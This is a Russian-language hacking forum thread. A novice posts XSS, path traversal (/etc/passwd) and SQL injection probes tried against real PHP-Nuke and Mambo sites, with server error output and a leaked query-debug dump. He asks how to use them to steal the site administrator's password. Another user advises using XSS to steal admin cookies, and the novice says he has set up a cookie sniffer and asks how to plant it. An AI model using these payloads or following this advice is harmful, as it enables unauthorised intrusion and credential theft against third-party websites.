Вобшем просмотрея я видео по влому нюки 7.8 попробывал некоторое из того что описано там
Пассивные XSS:
1)(параметр username)
http://ya.ru/nuke/modules.php?name=Your_Account&code=ggg&op=mailpasswd&username=<h1>[XSS] -ответ:Регистрационный код для [XSS] отправлен.

2)(дырявый поиск)
search"style="background:url(javascript:alert()) - выдал ошибку в пустом окошке.

3)http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00 -пишет You are so cool...

4)http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=[our query]
-ответ:

Результат поиска

Ничего не найдено по вашему запросу

999999999 Предыдущие

5)http://[target]/nuke75/index.php?inside_mod=1 - ответ:The html tags you attempted to use are not allowed [ Go Back ]

Вот вроде и всё подскажите плиз как мона с помощью этого узнать пас админа логин я знаю.
если можна опишите подробнее...
P.S. Извиняйте за корявое обьяснение.Заране благодарен за помощь

выдал ошибку в пустом окошке.
мда... Это и есть JavaScript! Короче тут XSS уязвимость....
ответ:The html tags you attempted to use are not allowed [ Go Back ]
Тут стоит фильтрация...
пишет You are so cool...
Тут тоже...

Короче юзай инфу по XSS и пойймешь, как спомощью этого украсть куки админа...

Вобшем почитал я статейки по хсс не всё конечна понял но смог снифер поставить единственая проблема как теперь сылку на него в сайт впихнуть :confused: .

Да кстати тута ещё один вопрос по мамбе назрел есть сайтик стоит мамба я вписал:

http://сайт.ru/index.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=[sql]/*
в ответ :

Notice: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = '85.140.29.41' WHERE content_id = 1' at lin in /home/c/cайт.h16.ru/WWW/includes/database.php on line 184

UPDATE mos_content_rating
SET rating_count = rating_count + 1,
rating_sum = rating_sum + 1,rating_count=[sql]/*,
lastip = МОЙ АЙПИ
WHERE content_id = 1

/home/c/сайт.ru/WWW/components/com_content/content.php:1426
/home/c/сайт.h16.ru/WWW/components/com_content/content.php:96
/home/c/сайт.h16.ru/WWW/index.php:180DB function failed with error number 1064
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1' at lin SQL=UPDATE mos_content_rating SET rating_count = rating_count + 1, rating_sum = rating_sum + 1,rating_count=[sql]/*, lastip = МОЙ АЙПИ WHERE content_id = 1
_____помоему это дырка???
Да кстати у них на главной странице вот такая фигня
внизу вылезает:

37 queries executed
1
SELECT template FROM mos_templates_menu WHERE client_id='0' AND menuid='0'--------------------------------------------------------------------------------2
DELETE FROM mos_session
WHERE (time < 1164353432)--------------------------------------------------------------------------------3
SELECT * FROM mos_session WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------4
UPDATE mos_session SET `time`='1164354332',`userid`='0',`usertype`='',`us ername`='',`gid`='0',`guest`='1' WHERE session_id='53399328d45328e8a9f739413b1596c2'--------------------------------------------------------------------------------5
SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup
FROM mos_mambots
WHERE published >= 1 AND access <= 0 AND folder='editors'
ORDER BY ordering--------------------------------------------------------------------------------6
SELECT folder, element, published, CONCAT_WS('/',folder,element) AS lookup
FROM mos_mambots
WHERE published >= 1 AND access <= 0 AND folder='editors-xtd'
ORDER BY ordering--------------------------------------------------------------------------------7
SELECT access FROM mos_menu WHERE link like 'index.php?option=com_poll&task=results%'--------------------------------------------------------------------------------8
SELECT * FROM mos_polls WHERE id='14'--------------------------------------------------------------------------------9
SELECT MIN(date) AS mindate, MAX(date) AS maxdate
FROM mos_poll_date
WHERE poll_id='14'--------------------------------------------------------------------------------10
SELECT a.text, count( DISTINCT b.id ) AS hits, count( DISTINCT b.id )/COUNT( DISTINCT c.id )*100.0 AS percent
FROM mos_poll_data AS a
LEFT JOIN mos_poll_date AS b ON b.vote_id = a.id
LEFT JOIN mos_poll_date AS c ON c.poll_id = a.pollid
WHERE a.pollid='14' AND a.text <> ''
GROUP BY a.id
ORDER BY a.id--------------------------------------------------------------------------------11
SELECT id, title
FROM mos_polls
WHERE published=1
ORDER BY id--------------------------------------------------------------------------------12
SELECT * FROM mos_menu WHERE id='0'--------------------------------------------------------------------------------13
SELECT id, title, module, position, content, showtitle, params
FROM mos_modules AS m, mos_modules_menu AS mm
WHERE m.published='1' AND m.access <= '0' AND m.client_id='0'
AND mm.moduleid=m.id
AND (mm.menuid = '0' OR mm.menuid = '0')
ORDER BY ordering--------------------------------------------------------------------------------14
SELECT id, link
FROM mos_menu
WHERE menutype='mainmenu' AND published='1'
ORDER BY parent, ordering LIMIT 1--------------------------------------------------------------------------------15
SELECT id, name, link, parent, type
FROM mos_menu
WHERE published='1'
ORDER BY parent, ordering--------------------------------------------------------------------------------16
SELECT m.* FROM mos_menu AS m
WHERE menutype='topmenu' AND published='1' AND access <= '0' AND parent='0'
ORDER BY ordering--------------------------------------------------------------------------------17
SELECT m.* FROM mos_menu AS m
WHERE menutype='mainmenu' AND published='1' AND access <= '0'
ORDER BY parent,ordering--------------------------------------------------------------------------------18
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------19
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=24'--------------------------------------------------------------------------------20
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------21
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=21'--------------------------------------------------------------------------------22
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------23
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=20'--------------------------------------------------------------------------------24
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------25
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=23'--------------------------------------------------------------------------------26
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------27
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=22'--------------------------------------------------------------------------------28
SELECT id
FROM mos_menu
WHERE type='content_typed' AND published='1' AND link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------29
SELECT id
FROM mos_menu
WHERE type='content_item_link' AND published='1' AND link='index.php?option=com_content&task=view&id=25'--------------------------------------------------------------------------------30
SELECT m.* FROM mos_menu AS m
WHERE menutype='othermenu' AND published='1' AND access <= '0'
ORDER BY parent,ordering--------------------------------------------------------------------------------31
SELECT count(*) AS numrows FROM mos_banner WHERE showBanner=1--------------------------------------------------------------------------------32
SELECT * FROM mos_banner WHERE showBanner=1
LIMIT 0,1--------------------------------------------------------------------------------33
SELECT p.id, p.title
FROM mos_poll_menu AS pm, mos_polls AS p
WHERE (pm.menuid='0' OR pm.menuid='0') AND p.id=pm.pollid
AND p.published=1--------------------------------------------------------------------------------34
SELECT id, text FROM mos_poll_data
WHERE pollid='14' AND text <> ''
ORDER BY id--------------------------------------------------------------------------------35
SELECT count(session_id) as guest_online FROM mos_session WHERE guest=1 AND (usertype is NULL OR usertype='')--------------------------------------------------------------------------------36
SELECT DISTINCT count(username) as user_online FROM mos_session WHERE guest=0 AND usertype <> 'administrator' AND usertype <> 'superadministrator'--------------------------------------------------------------------------------37
SELECT DISTINCT a.username
FROM mos_session AS a
WHERE (a.guest=0)

Помоему это таже дырка хотя может и ошибаюсь :(

Да кстати а как мона версию мамбы узнать?????

3)http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00 -пишет You are so cool...

он отжигает =))

он отжигает =))
Это ты к чему???

Ну а по теме может хоть кто нить ответит ???